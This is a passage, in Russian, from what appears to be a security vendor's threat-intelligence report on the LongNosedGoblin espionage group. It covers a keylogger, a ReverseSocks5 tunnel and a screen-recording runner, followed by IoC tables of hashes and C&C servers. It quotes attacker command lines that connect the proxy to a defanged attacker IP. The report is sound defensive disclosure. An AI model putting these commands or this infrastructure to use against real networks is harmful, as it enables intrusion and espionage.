\u0434\u0430\u043d\u043d\u044b\u0445 \u043e\u0442\u0434\u0435\u043b\u044f\u0435\u0442\u0441\u044f \u043d\u043e\u0432\u043e\u0439 \u0441\u0442\u0440\u043e\u043a\u043e\u0439, \u0437\u0430 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0441\u043b\u0435\u0434\u0443\u0435\u0442 \u0441\u0442\u0440\u043e\u043a\u0430 <span>ENDBLOCK<\/span>. \u042d\u0442\u043e\u0442 \u043f\u0440\u043e\u0446\u0435\u0441\u0441 \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0438 \u0441\u043e\u0445\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u043d\u0430\u043a\u043e\u043f\u043b\u0435\u043d\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 \u0432 \u0444\u0430\u0439\u043b \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0434\u0438\u0442 \u043a\u0430\u0436\u0434\u044b\u0435 10 \u0441\u0435\u043a\u0443\u043d\u0434. \u042d\u0442\u043e\u0442 \u0444\u0430\u0439\u043b \u043d\u0435 \u044d\u043a\u0441\u0444\u0438\u043b\u044c\u0442\u0440\u0443\u0435\u0442\u0441\u044f NosyLogger.<\/p>\n<h3>\u0414\u0440\u0443\u0433\u0438\u0435 \u0440\u0430\u0437\u0432\u0435\u0440\u043d\u0443\u0442\u044b\u0435 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u044b<\/h3>\n<h4>ReverseSocks5<\/h4>\n<p>\u0421\u0440\u0435\u0434\u0438 \u0434\u0440\u0443\u0433\u043e\u0433\u043e \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e, \u0440\u0430\u0437\u0432\u0435\u0440\u043d\u0443\u0442\u043e\u0433\u043e LongNosedGoblin, \u043c\u044b \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 open-source reverse SOCKS5 \u043f\u0440\u043e\u043a\u0441\u0438, \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u0439 \u043d\u0430 Go, \u043f\u043e\u0434 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435\u043c <a href=\"https:\/\/github.com\/Acebond\/ReverseSocks5\">ReverseSocks5<\/a>. \u041c\u044b \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u0435\u0433\u043e, \u043a\u043e\u0433\u0434\u0430 \u0437\u0430\u043c\u0435\u0442\u0438\u043b\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0445 \u0430\u0440\u0433\u0443\u043c\u0435\u043d\u0442\u043e\u0432 \u043a\u043e\u043c\u0430\u043d\u0434\u043d\u043e\u0439 \u0441\u0442\u0440\u043e\u043a\u0438:<\/p>\n<p><span>-connect 118.107.234[.]29:8080 -psk &#171;58fi04qQ&#187; \/F<\/span><\/p>\n<p>\u041e\u043f\u0446\u0438\u044f <span>-psk<\/span> \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0434\u043b\u044f \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0438 \u043f\u0440\u0435\u0434\u0432\u0430\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0440\u0430\u0437\u0434\u0435\u043b\u044f\u0435\u043c\u043e\u0433\u043e \u043a\u043b\u044e\u0447\u0430 \u0434\u043b\u044f \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0438 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438. \u0410\u0440\u0433\u0443\u043c\u0435\u043d\u0442 <span>\/F<\/span> \u043d\u0435 \u043e\u0431\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u0435\u0442\u0441\u044f ReverseSocks5 \u0438, \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e, \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043d\u0435\u043f\u0440\u0435\u0434\u043d\u0430\u043c\u0435\u0440\u0435\u043d\u043d\u044b\u043c; \u044d\u0442\u043e\u0442 \u0430\u0440\u0433\u0443\u043c\u0435\u043d\u0442 \u043e\u0431\u044b\u0447\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0441 <a href=\"https:\/\/learn.microsoft.com\/en-us\/windows-server\/administration\/windows-commands\/schtasks-create\">schtasks create<\/a>.<\/p>\n<p>\u0417\u0430\u0442\u0435\u043c \u043c\u044b \u0437\u0430\u043c\u0435\u0442\u0438\u043b\u0438 \u0434\u0440\u0443\u0433\u043e\u0439 \u043d\u0430\u0431\u043e\u0440 \u0430\u0440\u0433\u0443\u043c\u0435\u043d\u0442\u043e\u0432 \u043a\u043e\u043c\u0430\u043d\u0434\u043d\u043e\u0439 \u0441\u0442\u0440\u043e\u043a\u0438 (\u0431\u0435\u0437 \u0430\u0440\u0433\u0443\u043c\u0435\u043d\u0442\u0430 <span>\/F<\/span>):<\/p>\n<p><span>-connect 118.107.234[.]29:8080 -psk &#171;15Kaf22N3b&#187;<\/span><\/p>\n<p>\u042d\u0442\u043e\u0442 \u0432\u0442\u043e\u0440\u043e\u0439 \u043d\u0430\u0431\u043e\u0440 \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u0435\u0442 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044e ReverseSocks5, \u0433\u0434\u0435 \u043c\u044b \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u043b\u0438 PowerShell \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u0440\u043e\u0434\u0438\u0442\u0435\u043b\u044c\u0441\u043a\u043e\u0433\u043e \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430. NosyDownloader \u0442\u0430\u043a\u0436\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u043b\u0441\u044f \u0432 \u044d\u0442\u043e \u0432\u0440\u0435\u043c\u044f, \u0447\u0442\u043e \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442 \u043d\u0430 \u0442\u043e, \u0447\u0442\u043e \u043e\u0431\u0440\u0430\u0437\u0435\u0446, \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e, \u0431\u044b\u043b \u0440\u0430\u0437\u0432\u0435\u0440\u043d\u0443\u0442 \u0432\u043c\u0435\u0441\u0442\u0435 \u0441 \u043d\u0438\u043c.<\/p>\n<h4>\u041e\u0431\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a \u0430\u0440\u0433\u0443\u043c\u0435\u043d\u0442\u043e\u0432<\/h4>\n<p>\u042d\u0442\u043e \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0435 \u043d\u0430 C#\/.NET \u0441 \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0438\u043c \u0438\u043c\u0435\u043d\u0435\u043c <span>Binary<\/span>; \u0435\u0434\u0438\u043d\u0441\u0442\u0432\u0435\u043d\u043d\u0430\u044f \u0446\u0435\u043b\u044c \u044d\u0442\u043e\u0433\u043e \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430 \u2014 \u0437\u0430\u043f\u0443\u0441\u043a \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f, \u043f\u0435\u0440\u0435\u0434\u0430\u043d\u043d\u043e\u0433\u043e \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u0430\u0440\u0433\u0443\u043c\u0435\u043d\u0442\u0430. \u041c\u044b \u0432\u0438\u0434\u0435\u043b\u0438 \u0438\u043c\u044f \u0444\u0430\u0439\u043b\u0430 <span>TCOEdge.exe<\/span> \u0432 \u043a\u043e\u043c\u0430\u043d\u0434\u043d\u043e\u0439 \u0441\u0442\u0440\u043e\u043a\u0435 \u0432\u043c\u0435\u0441\u0442\u0435 \u0441 \u0430\u0440\u0433\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0438, \u0441\u043f\u0435\u0446\u0438\u0444\u0438\u0447\u043d\u044b\u043c\u0438 \u0434\u043b\u044f \u043c\u0443\u043b\u044c\u0442\u0438\u043c\u0435\u0434\u0438\u0439\u043d\u043e\u0433\u043e \u0444\u0440\u0435\u0439\u043c\u0432\u043e\u0440\u043a\u0430 <a href=\"https:\/\/ffmpeg.org\/\">FFmpeg<\/a>; \u043e\u043d \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0441\u044f \u0434\u043b\u044f \u0437\u0430\u043f\u0438\u0441\u0438 \u044d\u043a\u0440\u0430\u043d\u0430 \u0438 \u0437\u0430\u0445\u0432\u0430\u0442\u0430 \u0437\u0432\u0443\u043a\u0430, \u0441\u043e\u0445\u0440\u0430\u043d\u044f\u044f \u0435\u0433\u043e \u0432 <span>C:WindowsTempoutput.avi<\/span>.<\/p>\n<h2>\u0417\u0430\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435<\/h2>\n<p>LongNosedGoblin \u2014 \u044d\u0442\u043e APT-\u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u0430\u044f \u0441 \u041a\u0438\u0442\u0430\u0435\u043c, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043d\u0430\u0446\u0435\u043b\u0435\u043d\u0430 \u043d\u0430 \u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0435 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438 \u0432 \u042e\u0433\u043e-\u0412\u043e\u0441\u0442\u043e\u0447\u043d\u043e\u0439 \u0410\u0437\u0438\u0438 \u0438 \u042f\u043f\u043e\u043d\u0438\u0438. \u041d\u0430\u0448 \u0430\u043d\u0430\u043b\u0438\u0437 \u0438\u0445 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0439 \u0432\u044b\u044f\u0432\u0438\u043b \u043c\u043d\u043e\u0433\u043e\u0447\u0438\u0441\u043b\u0435\u043d\u043d\u044b\u0435 \u043e\u0431\u0440\u0430\u0437\u0446\u044b \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u043e\u0433\u043e \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e, \u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u0433\u0440\u0443\u043f\u043f\u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0434\u043b\u044f \u043a\u0438\u0431\u0435\u0440\u0448\u043f\u0438\u043e\u043d\u0430\u0436\u0430 \u043f\u0440\u043e\u0442\u0438\u0432 \u0441\u0432\u043e\u0438\u0445 \u0436\u0435\u0440\u0442\u0432. \u041f\u0440\u0438\u043c\u0435\u0447\u0430\u0442\u0435\u043b\u044c\u043d\u043e, \u0447\u0442\u043e LongNosedGoblin \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0433\u0440\u0443\u043f\u043f\u043e\u0432\u044b\u0435 \u043f\u043e\u043b\u0438\u0442\u0438\u043a\u0438 \u0434\u043b\u044f \u043f\u0435\u0440\u0435\u043c\u0435\u0449\u0435\u043d\u0438\u044f \u0432\u043d\u0443\u0442\u0440\u0438 \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0439 \u0441\u0435\u0442\u0438.<\/p>\n<blockquote>\n<div><em>\u041f\u043e \u0432\u0441\u0435\u043c \u0432\u043e\u043f\u0440\u043e\u0441\u0430\u043c, \u043a\u0430\u0441\u0430\u044e\u0449\u0438\u043c\u0441\u044f \u043d\u0430\u0448\u0438\u0445 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0439, \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u043d\u0430 WeLiveSecurity, \u043f\u043e\u0436\u0430\u043b\u0443\u0439\u0441\u0442\u0430, \u0441\u0432\u044f\u0436\u0438\u0442\u0435\u0441\u044c \u0441 \u043d\u0430\u043c\u0438 \u043f\u043e \u0430\u0434\u0440\u0435\u0441\u0443 <a href=\"mailto:threatintel@eset.com?utm_source=welivesecurity.com&amp;utm_medium=referral&amp;utm_campaign=autotagging&amp;utm_content=eset-research&amp;utm_term=en\">threatintel@eset.com<\/a>. <\/em><\/div>\n<div><em>ESET Research \u043f\u0440\u0435\u0434\u043b\u0430\u0433\u0430\u0435\u0442 \u0447\u0430\u0441\u0442\u043d\u044b\u0435 \u043e\u0442\u0447\u0435\u0442\u044b \u043f\u043e APT-\u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0435 \u0438 \u043f\u043e\u0442\u043e\u043a\u0438 \u0434\u0430\u043d\u043d\u044b\u0445. \u041f\u043e \u0432\u0441\u0435\u043c \u0432\u043e\u043f\u0440\u043e\u0441\u0430\u043c, \u043a\u0430\u0441\u0430\u044e\u0449\u0438\u043c\u0441\u044f \u044d\u0442\u043e\u0439 \u0443\u0441\u043b\u0443\u0433\u0438, \u043f\u043e\u0441\u0435\u0442\u0438\u0442\u0435 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0443 <a href=\"https:\/\/www.eset.com\/int\/business\/services\/threat-intelligence\/?utm_source=welivesecurity.com&amp;utm_medium=referral&amp;utm_campaign=wls-research&amp;utm_content=longnosedgoblin-tries-sniff-out-governmental-affairs-southeast-asia-japan&amp;sfdccampaignid=7011n0000017htTAAQ\">ESET Threat Intelligence<\/a>.<\/em><\/div>\n<\/blockquote>\n<h2>IoCs<\/h2>\n<p>\u041f\u043e\u043b\u043d\u044b\u0439 \u0441\u043f\u0438\u0441\u043e\u043a \u0438\u043d\u0434\u0438\u043a\u0430\u0442\u043e\u0440\u043e\u0432 \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0430\u0446\u0438\u0438 (IoCs) \u0438 \u043e\u0431\u0440\u0430\u0437\u0446\u043e\u0432 \u043c\u043e\u0436\u043d\u043e \u043d\u0430\u0439\u0442\u0438 \u0432 <a href=\"https:\/\/github.com\/eset\/malware-ioc\/tree\/master\/longnosedgoblin\">\u043d\u0430\u0448\u0435\u043c \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u0438 GitHub<\/a>.<\/p>\n<h3>\u0424\u0430\u0439\u043b\u044b<\/h3>\n<\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\">\n<thead>\n<tr>\n<td><strong>SHA-1<\/strong><\/td>\n<td><strong>\u0418\u043c\u044f \u0444\u0430\u0439\u043b\u0430<\/strong><\/td>\n<td><strong>\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u0435<\/strong><\/td>\n<td><strong>\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><span>4E3F6E9D0F443F4C4297<wbr><\/wbr>4A0551EEE957B498DA3D<\/span><\/td>\n<td><span>History.ini<\/span><\/td>\n<td>MSIL\/Spy.Agent.EUU<\/td>\n<td>NosyHistorian.<\/td>\n<\/tr>\n<tr>\n<td><span>CD745BD2636F607CC4FB<wbr><\/wbr>9389535BF3579321CA72<\/span><\/td>\n<td><span>History.ini<\/span><\/td>\n<td>MSIL\/Spy.Agent.EUU<\/td>\n<td>NosyHistorian.<\/td>\n<\/tr>\n<tr>\n<td><span>154A35DD4117DB760699<wbr><\/wbr>C2092AFB307E94008506<\/span><\/td>\n<td><span>Registry.plo<\/span><\/td>\n<td>MSIL\/TrojanDropper<wbr><\/wbr>.Agent.GBQ<\/td>\n<td>NosyDoor stage 1.<\/td>\n<\/tr>\n<tr>\n<td><span>B1D4A283A9CCC9E34993<wbr><\/wbr>DD2093A904AFBD88B9B9<\/span><\/td>\n<td><span>Registry.pol<\/span><\/td>\n<td>MSIL\/TrojanDropper<wbr><\/wbr>.Agent.GBQ<\/td>\n<td>NosyDoor stage 1.<\/td>\n<\/tr>\n<tr>\n<td><span>77D2A8CB316B7A470E76<wbr><\/wbr>E163551A00BB16A696C5<\/span><\/td>\n<td><span>Registry.plo<\/span><\/td>\n<td>MSIL\/TrojanDropper<wbr><\/wbr>.Agent.GBQ<\/td>\n<td>NosyDoor stage 1.<\/td>\n<\/tr>\n<tr>\n<td><span>F93E449C5520C4718E28<wbr><\/wbr>4375C54BE33711505985<\/span><\/td>\n<td><span>Registry.pol<\/span><\/td>\n<td>MSIL\/TrojanDropper<wbr><\/wbr>.Agent.GBQ<\/td>\n<td>NosyDoor stage 1.<\/td>\n<\/tr>\n<tr>\n<td><span>1959E2198D6F81B2604D<wbr><\/wbr>F7AC1F508AEB7A6FA07E<\/span><\/td>\n<td><span>SharedReg.dll<\/span><\/td>\n<td>MSIL\/Kryptik.AJBA<\/td>\n<td>NosyDoor stage 2.<\/td>\n<\/tr>\n<tr>\n<td><span>E0B44715BC4C327C04E6<wbr><\/wbr>3F881ECC087B7ACBD306<\/span><\/td>\n<td>N\/A<\/td>\n<td>MSIL\/Agent.ESF<\/td>\n<td>NosyDoor stage 3.<\/td>\n<\/tr>\n<tr>\n<td><span>43C8AE8561E7E3BF9CD7<wbr><\/wbr>48136C091099E5CBEEEE<\/span><\/td>\n<td>N\/A<\/td>\n<td>MSIL\/Agent.ESF<\/td>\n<td>NosyDoor stage 3.<\/td>\n<\/tr>\n<tr>\n<td><span>D11FC2D6159CB8BA392B<wbr><\/wbr>145B3EE4ADFA15DB4C83<\/span><\/td>\n<td>N\/A<\/td>\n<td>MSIL\/Agent.ESF<\/td>\n<td>NosyDoor stage 3.<\/td>\n<\/tr>\n<tr>\n<td><span>A0A80AC293645076EBAE<wbr><\/wbr>393FF0A6A4229E2EDE1C<\/span><\/td>\n<td><span>pmp.exe<\/span><\/td>\n<td>Win64\/Agent.DNY<\/td>\n<td>NosyStealer stage 1.<\/td>\n<\/tr>\n<tr>\n<td><span>DDBBAE33E04A49D17DD2<wbr><\/wbr>4D85B637667B4407AE19<\/span><\/td>\n<td><span>SERV.dll<\/span><\/td>\n<td>Win64\/Agent.DNX<\/td>\n<td>NosyStealer stage 2.<\/td>\n<\/tr>\n<tr>\n<td><span>60158C509446893B3B57<wbr><\/wbr>D40DC4B4B3795FCDF369<\/span><\/td>\n<td><span>HPSupportAssistant<wbr><\/wbr>.exe<\/span><\/td>\n<td>PowerShell\/TrojanDown<wbr><\/wbr>loader.Agent.JJO<\/td>\n<td>NosyDownloader.<\/td>\n<\/tr>\n<tr>\n<td><span>F5B7440EE25116A49EC5<wbr><\/wbr>EE82507B353880217AC1<\/span><\/td>\n<td><span>RTLWVern.exe<\/span><\/td>\n<td>PowerShell\/Agent.BDR<\/td>\n<td>NosyDownloader.<\/td>\n<\/tr>\n<tr>\n<td><span>85939C56BFCACD0993E6<wbr><\/wbr>FB9F7CFD6137601FB7D4<\/span><\/td>\n<td><span>hpSmartAdapter.exe<\/span><\/td>\n<td>Win32\/Agent.AGIJ<\/td>\n<td>NosyDownloader.<\/td>\n<\/tr>\n<tr>\n<td><span>C66F9FEC0F8CBF577840<wbr><\/wbr>944F61198A75B3E2A58C<\/span><\/td>\n<td><span>hputils.exe<\/span><\/td>\n<td>Win32\/Agent.AGII<\/td>\n<td>NosyDownloader.<\/td>\n<\/tr>\n<tr>\n<td><span>4C2FCCE3BAB4144D90C7<wbr><\/wbr>41A6D77ADF209C786B54<\/span><\/td>\n<td><span>IGCCSvc.exe<\/span><\/td>\n<td>MSIL\/Spy.Key<wbr><\/wbr>logger.FVW<\/td>\n<td>NosyLogger.<\/td>\n<\/tr>\n<tr>\n<td><span>161A25CB0B8FA998BF1B<wbr><\/wbr>DEE31F06F24876453CDF<\/span><\/td>\n<td><span>AdobeHelper.exe<\/span><\/td>\n<td>WinGo\/ReverseShell.DX<\/td>\n<td>ReverseSocks5.<\/td>\n<\/tr>\n<tr>\n<td><span>4D61A9FBBCC4F7A37BE2<wbr><\/wbr>1548B55BB5B9B837F83B<\/span><\/td>\n<td><span>msi.dll<\/span><\/td>\n<td>Win64\/Agent.DOT<\/td>\n<td>NosyStealer stage 2.<\/td>\n<\/tr>\n<tr>\n<td><span>5AE440805719250AAEFE<wbr><\/wbr>E9B39DACD23D2FB573CD<\/span><\/td>\n<td><span>TCOCertified.exe<\/span><\/td>\n<td>MSIL\/Runner.BW<\/td>\n<td>Argument runner.<\/td>\n<\/tr>\n<tr>\n<td><span>E93D32C739825519A10A<wbr><\/wbr>4C52C5F1EE33936E4FDB<\/span><\/td>\n<td>N\/A<\/td>\n<td>WinGo\/PSW.Agent.FZ<\/td>\n<td>NosyStealer stage 4.<\/td>\n<\/tr>\n<tr>\n<td><span>212126896D38C1EE5732<wbr><\/wbr>0FB6940FED7A6E30D9EA<\/span><\/td>\n<td>N\/A<\/td>\n<td>Win32\/Agent.AGHB<\/td>\n<td>NosyStealer stage 3.<\/td>\n<\/tr>\n<tr>\n<td><span>CFFE15AA4D0F9E6577CC<wbr><\/wbr>B509ACE9C588937943F2<\/span><\/td>\n<td><span>HPNDFInterface.exe<\/span><\/td>\n<td>PowerShell\/TrojanDown<wbr><\/wbr>loader.Agent.JJO<\/td>\n<td>NosyDownloader.<\/td>\n<\/tr>\n<tr>\n<td><span>6AC22CE60B706E3B9A79<wbr><\/wbr>27633116911E1087C0D4<\/span><\/td>\n<td><span>bemsvc.exe<\/span><\/td>\n<td>PowerShell\/TrojanDown<wbr><\/wbr>loader.Agent.JJO<\/td>\n<td>NosyDownloader.<\/td>\n<\/tr>\n<tr>\n<td><span>2C1959DD85424CEDC96B<wbr><\/wbr>1BB86A95FCA440CB9E36<\/span><\/td>\n<td><span>HPDeviceCheck.exe<\/span><\/td>\n<td>Win32\/Agent.AGWU<\/td>\n<td>NosyDownloader.<\/td>\n<\/tr>\n<tr>\n<td><span>46107B1292B830D9BCEB<wbr><\/wbr>BDA6EEDB32FBC05707B4<\/span><\/td>\n<td><span>HP.OCF.exe<\/span><\/td>\n<td>Win32\/Patched.NLL<\/td>\n<td>NosyDownloader.<\/td>\n<\/tr>\n<tr>\n<td><span>581464978C29B2BC79C6<wbr><\/wbr>5766E62011C94D2CBEAB<\/span><\/td>\n<td><span>HP.OCF.exe<\/span><\/td>\n<td>Win32\/Patched.NLL<\/td>\n<td>NosyDownloader.<\/td>\n<\/tr>\n<tr>\n<td><span>0D91A0E52212EC44E32C<wbr><\/wbr>47F7760AF3B473B72798<\/span><\/td>\n<td><span>ax_installer.exe<\/span><\/td>\n<td>PowerShell\/TrojanDown<wbr><\/wbr>loader.Agent.JJO<\/td>\n<td>NosyDownloader.<\/td>\n<\/tr>\n<tr>\n<td><span>48D715466857FB0C6CD0<wbr><\/wbr>249DE6D960FC199438E1<\/span><\/td>\n<td><span>btdevmanager.exe<\/span><\/td>\n<td>MSIL\/Spy.Keylogger<wbr><\/wbr>_AGen.DL<\/td>\n<td>NosyLogger.<\/td>\n<\/tr>\n<tr>\n<td><span>563677CFACD328EA2478<wbr><\/wbr>836E58A8BD0DF11206A3<\/span><\/td>\n<td><span>info.txt<\/span><\/td>\n<td>MSIL\/Spy.Agent.EUU<\/td>\n<td>NosyHistorian.<\/td>\n<\/tr>\n<tr>\n<td><span>AC2264C56121141DAF75<wbr><\/wbr>1A3852CD34F3ACB1D63C<\/span><\/td>\n<td><span>ntrtscan.exe<\/span><\/td>\n<td>MSIL\/Spy.Agent.EUU<\/td>\n<td>NosyHistorian.<\/td>\n<\/tr>\n<tr>\n<td><span>70A615BC580522E1EEE4<wbr><\/wbr>B61394DC7A247FE47022<\/span><\/td>\n<td><span>ntrtscan.exe<\/span><\/td>\n<td>MSIL\/Spy.Agent.EUU<\/td>\n<td>NosyHistorian.<\/td>\n<\/tr>\n<tr>\n<td><span>E9C5E4AA335DFBD25786<wbr><\/wbr>234A58CE4C9C551D1A41<\/span><\/td>\n<td><span>oci.dll<\/span><\/td>\n<td>Win64\/Kryptik_A<wbr><\/wbr>Gen.UW<\/td>\n<td>Loader of unknown malware (possibly Cobalt Strike).<\/td>\n<\/tr>\n<tr>\n<td><span>EC9CEB599DF3BDFFAD53<wbr><\/wbr>6900D0E6D48E2E5FF12B<\/span><\/td>\n<td><span>mscorsvc.dll<\/span><\/td>\n<td>Win64\/Kryptik.EHP<\/td>\n<td>Loader of unknown malware (possibly Cobalt Strike).<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3>\u0421\u0435\u0442\u044c<\/h3>\n<\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" width=\"642\">\n<thead>\n<tr>\n<td width=\"142\"><strong>IP<\/strong><\/td>\n<td width=\"190\"><strong>\u0414\u043e\u043c\u0435\u043d<\/strong><\/td>\n<td width=\"104\"><strong>\u0425\u043e\u0441\u0442\u0438\u043d\u0433-\u043f\u0440\u043e\u0432\u0430\u0439\u0434\u0435\u0440<\/strong><\/td>\n<td width=\"71\"><strong>\u041f\u0435\u0440\u0432\u044b\u0439 \u0440\u0430\u0437 \u0437\u0430\u043c\u0435\u0447\u0435\u043d<\/strong><\/td>\n<td width=\"113\"><strong>\u0414\u0435\u0442\u0430\u043b\u0438<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"142\"><span>118.107.234[.]26<\/span><\/td>\n<td width=\"190\"><span>www.sslvpn<wbr><\/wbr>server[.]com<\/span><\/td>\n<td width=\"104\">IRT\u2011IPSERVERONE\u2011MY<\/td>\n<td width=\"71\">2022\u201104\u201109<\/td>\n<td width=\"113\">\u0421\u0435\u0440\u0432\u0435\u0440 C&amp;C \u0434\u043b\u044f NosyDownloader.<\/td>\n<\/tr>\n<tr>\n<td width=\"142\"><span>103.159.132[.]30<\/span><\/td>\n<td width=\"190\"><span>www.thread<wbr><\/wbr>stub[.]com<\/span><\/td>\n<td width=\"104\">IRT-FBP-MY<\/td>\n<td width=\"71\">2023\u201110\u201103<\/td>\n<td width=\"113\">\u0421\u0435\u0440\u0432\u0435\u0440 C&amp;C \u0434\u043b\u044f NosyDownloader.<\/td>\n<\/tr>\n<tr>\n<td width=\"142\"><span>101.99.88[.]113<\/span><\/td>\n<td width=\"190\"><span>www.blaze<wbr><\/wbr>newso[.]com<\/span><\/td>\n<td width=\"104\">Shinjiru Technology Sdn Bhd<\/td>\n<td width=\"71\">2024\u201108\u201123<\/td>\n<td width=\"113\">\u0421\u0435\u0440\u0432\u0435\u0440 C&amp;C \u0434\u043b\u044f NosyDownloader.<\/td>\n<\/tr>\n<tr>\n<td width=\"142\"><span>118.107.234[.]29<\/span><\/td>\n<td width=\"190\">N\/A<\/td>\n<td width=\"104\">IRT\u2011IPSERVERONE\u2011MY<\/td>\n<td width=\"71\">2023\u201103\u201120<\/td>\n<td width=\"113\">\u0421\u0435\u0440\u0432\u0435\u0440 ReverseSocks5.<\/td>\n<\/tr>\n<tr>\n<td width=\"142\"><span>101.99.88[.]188<\/span><\/td>\n<td width=\"190\"><span>www.privacy<wbr><\/wbr>policy-my[.]com<\/span><\/td>\n<td width=\"104\">\u0410\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440 Shinjiru Technology Sdn Bhd<\/td>\n<td width=\"71\">2024\u201110\u201123<\/td>\n<td width=\"113\">\u0421\u0435\u0440\u0432\u0435\u0440 C&amp;C \u0434\u043b\u044f NosyDownloader.<\/td>\n<\/tr>\n<tr>\n<td width=\"142\"><span>38.54.17[.]131<\/span><\/td>\n<td width=\"190\">N\/A<\/td>\n<td width=\"104\">Kaopu Cloud HK Limited<\/td>\n<td width=\"71\">2025\u201103\u201105<\/td>\n<td width=\"113\">\u0421\u0435\u0440\u0432\u0435\u0440, \u043d\u0430 \u043a\u043e\u0442\u043e\u0440\u043e\u043c \u0440\u0430\u0437\u043c\u0435\u0449\u0435\u043d\u043e \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0435 \u041f\u041e, \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e, Cobalt Strike.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>\u0422\u0435\u0445\u043d\u0438\u043a\u0438 MITRE ATT&amp;CK<\/h2>\n<p>\u042d\u0442\u0430 \u0442\u0430\u0431\u043b\u0438\u0446\u0430 \u0431\u044b\u043b\u0430 \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u0430 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c <a href=\"https:\/\/attack.mitre.org\/resources\/versions\/\">\u0432\u0435\u0440\u0441\u0438\u0438 18<\/a> \u0444\u0440\u0435\u0439\u043c\u0432\u043e\u0440\u043a\u0430 MITRE ATT&amp;CK.<\/p>\n<\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" width=\"642\">\n<thead>\n<tr>\n<td width=\"113\"><strong>\u0422\u0430\u043a\u0442\u0438\u043a\u0430<\/strong><\/td>\n<td width=\"113\"><strong>ID<\/strong><\/td>\n<td 